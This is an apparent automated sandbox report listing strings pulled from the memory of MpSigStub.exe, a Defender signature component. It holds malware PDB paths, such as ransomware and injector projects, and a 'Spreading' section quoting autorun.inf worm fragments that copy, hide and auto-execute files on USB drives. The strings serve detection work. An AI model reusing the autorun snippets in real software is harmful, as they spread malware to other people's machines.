Source: Binary string: \\WOO\\HT\\HT Server\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: \bin\winfdmscheme.pdb source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: RegAsm.pdb source: tKZVPq.exe
Source: Binary string: SAVService.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: zC:\Users\EchoHackCmd\source\repos\Minecraft_DLL_Injector\Minecraft_DLL_Injector\obj\x64\Release\Minecraft_DLL_Injector.pdb source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp
Source: Binary string: 7laIR+|.XJ5aA0aa.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: wscript.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: wevtutil.pdb source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp
Source: Binary string: \isn.pdb source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp
Source: Binary string: C:\\Users\\Lucca\\AppData\\Local\\Temp\\.*\.pdb source: MpSigStub.exe, 00000023.00000003.18307074601.0000015B1AA4C000.00000004.00000001.sdmp
Source: Binary string: \Ransomware2.0.pdb source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdbx source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp
Source: Binary string: C:\\Users\\john\\Documents\\Visual Studio 2008\\Projects\\EncryptFile.*\\.*\\EncryptFile.exe.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp
Source: Binary string: \rANSOM\rANSOM\obj\Sanyasteakler\rANSOM.pdb source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdbxx source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: megasync.pdb source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb3 source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: csgoInjector.pdb source: MpSigStub.exe, 00000023.00000003.18351150877.0000015B1B40C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: vga256.pdb source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp
Source: Binary string: kernel32.pdb source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp
Source: Binary string: acpi.pdbN source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: Fwizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\FancHuible.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb0 source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: m:\VP\QM\trunk\output\Recorder.pdb source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp
Source: Binary string: stscast.pdb source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp
Source: Binary string: winscard.pdb source: MpSigStub.exe, 00000023.00000003.18319810399.0000015B1BE00000.00000004.00000001.sdmp
Source: Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 00000023.00000003.18301552816.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: \InstallGoogleToolBar\InstallGoogleToolBar\obj\Debug\InstallGoogleToolBar.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: \ProcExpDriver.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: \Current\wear.pdb source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp
Source: Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp
Source: Binary string: hWEHW#@HJERKJERJER^$.Pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: e:\caoe.PDBa source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: \yacdl\Release\yacdl.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: Krypton\source\repos\UAC\UAC\obj\Release\UAC.pdb source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp
Source: Binary string: mpengine.pdb source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp
Source: Binary string: XrfZPp2C.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: Z:\\Work\\Make Troy\\Concealment Troy\\Exe_Concealment_Troy\(Winlogon_Shell\)\\.*.pdb source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp
Source: Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp
Source: Binary string: w:\work\vcprj\prj\downloader\Release\injdldr.pdb source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp
Source: Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp
Source: Binary string: security.pdb source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 00000023.00000003.18302834450.0000015B1BFE8000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp
Source: Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb3 source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp
Source: Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp
Source: Binary string: \Conduit\RnD\Client\IE\Dev\6.16\6.16.1\Release\hk64tbedrs.pdb source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp
Source: Binary string: D:\yo\chaos\Release\chaos.pdb source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp
Source: Binary string: nafde.pdb source: MpSigStub.exe, 00000023.00000003.18301552816.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp
Source: Binary string: autofmt.pdb source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp
Source: Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp
Source: Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp
Source: Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp
Source: Binary string: sfc.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp
Source: Binary string: Uc:\Users\Main\Desktop\PackagingModule\PackagingModule\obj\Release\PackagingModule.pdb] source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp
Source: Binary string: AWInstaller.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp
Source: Binary string: e:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Xml\System.Xml.pdb source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp
Source: Binary string: PassView.pdb source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp
Source: Binary string: Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb3 source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: Tokenvator.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: \iSafe\trunk\bin\iSafeSvc2.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp
Source: Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp
Source: Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp
Source: Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb] source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp
Source: Binary string: \ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp
Source: Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: (d:\p\loser\a\a\objfre_wxp_x86\i386\A.pdb source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp
Source: Binary string: -\BetterInstaller\Release\BetterInstaller.pdb source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: dxva2.pdb3 source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp
Source: Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: obj\Debug\WinCalendar.pdb source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp
Source: Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: subst.pdb source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: \BaseFlash.pdb source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp
Source: Binary string: Win32\Release\Sdrsrv.pdb source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp
Source: Binary string: Cryptor_noVSSnoPers.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp
Source: Binary string: C:\mainProduct(old)\x86_bild_cryptor\shell_gen\Release\data_protect2.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp
Source: Binary string: Archer_Add_Packet\Release\Packet.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp
Source: Binary string: \R980\Release\R980.pdb source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp
Source: Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp
Source: Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: \T+M\Result\DocPrint.pdb] source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp
Source: Binary string: \13930308\Bot_70_FIX HEADER_FIX_LONGURL 73_StableAndNewProtocol - login all\Release\Bot.pdb source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp
Source: Binary string: \Release\mailermodule199.pdb source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp
Source: Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp
Source: Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdb source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: \wyvernlocker.pdb source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp
Source: Binary string: \SecurityService\SecurityService\obj\Release\WindowsSecurityService.pdb source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: cryptdll.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp

Spreading:

Yara detected Autohotkey Downloader Generic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
May infect USB drives
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp Binary or memory string: AutoRun.infd
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp Binary or memory string: AutoRun.infd2Program Files\Common Files\Microsoft Shared\MSINFO
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: %c:\Autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: (/c echo [autorun] >>
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: .*if"%1"=="+"attrib+s+a+h+r%2\autorun.inf:end
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: \autorun.inf\
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: [autorun]shellexecute=recycler\s-6-
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: `[autorun]shellexecute=recycler\s-6-
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: '[autorun]
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: 3:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: [autorun]]
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: Y[autorun]
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp Binary or memory string: [autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp Binary or memory string: /[autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp Binary or memory string: X:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp Binary or memory string: .vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp Binary or memory string: /cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp Binary or memory string: +/cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp Binary or memory string: ;&lt;br/&gt;[autorun]&lt;br/&gt;open=terserah.exe&lt;br/&gt;shellexecute=terserah.exe&lt;br/&gt;action=openfoldert
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp Binary or memory string: t;&lt;br/&gt;[autorun]&lt;br/&gt;open=terserah.exe&lt;br/&gt;shellexecute=terserah.exe&lt;br/&gt;action=openfoldert
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp Binary or memory string: AUTORUN.INF
Source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp Binary or memory string: autorun.infx
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: %A_LoopField%:\AutoRun.inf
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: [AUTORUN]
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: AUTORUN.INF[AUTORUN]
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: AUTORUN.INF[AUTORUN]
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: 'kill_del(, a_loopfield ":\autorun.inf")
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: %TsDv%\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: [autorun]ACTION=Open USB Driveopen=
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: filesetattrib, +RASH, %TsDv%\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: [autorun]shellexecute=speedkill3.vbsaction=icon=1.icolabel=flesh
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: B[autorun]shellexecute=speedkill3.vbsaction=icon=1.icolabel=flesh
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: echo [AutoRun] > %%
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: filesetattrib($var[$i]&"\autorun.inf","-hsr
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: |filesetattrib($var[$i]&"\autorun.inf","-hsr
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: =fileopen($var[$i]&"\autorun.inf",10)filewrite($
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: ,"[autorun]"&@crlf)
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp Binary or memory string: copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp Binary or memory string: 8copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp Binary or memory string: Autorun.inf]
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp Binary or memory string: autorun.infS
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: c:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: [autorun]@#Open=tool.exe@#Shellexecute=tool.exe@#Shell
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: 6[autorun]@#Open=tool.exe@#Shellexecute=tool.exe@#Shell
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: autorun.inf]
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: iniwrite($fix[$a]&"\autorun.inf","autorun","shellexecute","temp.pif")
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: Giniwrite($fix[$a]&"\autorun.inf","autorun","shellexecute","temp.pif")
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: \\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: [autorun]open=
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: [autorun]action=openshellexecute=
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: \sysautorun.inf
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: \sysautorun.inf]
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: 0AutoRun.inf
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: 0[AutoRun]
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: %s:\AutoRun.inf
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp Binary or memory string: :\autorun.infopenAutoRun]
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp Binary or memory string: [autorun]shell\open\command=d:\systemvolumeinformation.exeshell\explore\command=d:\systemvolumeinformation.exe
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp Binary or memory string: p[autorun]shell\open\command=d:\systemvolumeinformation.exeshell\explore\command=d:\systemvolumeinformation.exe
